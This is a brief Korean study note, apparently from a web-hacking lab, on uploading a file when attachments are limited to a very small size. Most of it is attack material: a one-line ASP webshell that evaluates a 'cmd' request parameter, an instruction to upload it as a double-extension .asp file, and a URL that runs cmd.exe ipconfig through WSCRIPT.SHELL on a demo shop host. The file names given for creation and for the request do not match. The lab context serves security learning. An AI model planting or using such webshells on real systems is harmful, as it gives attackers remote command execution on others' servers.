첨부 파일의 크기를 매우 작게 제한했을 경우
⇒ one line webshell
<%eval(request("cmd"))%>
Plain Text
복사
⇒ oneline.txt.asp 파일 생성 후 업로드
192.168.0.135/demoshop/shop_board/upload_file/oneline.jpeg.asp?cmd=response.write(Server.CreateObject(%22WSCRIPT.SHELL%22).exec(%22cmd.exe%20%3E%20/c%20ipconfig%22).stdout.readall)
Plain Text
복사
ipconfig 명령 실행 시 확인할 수 있는 정보 추출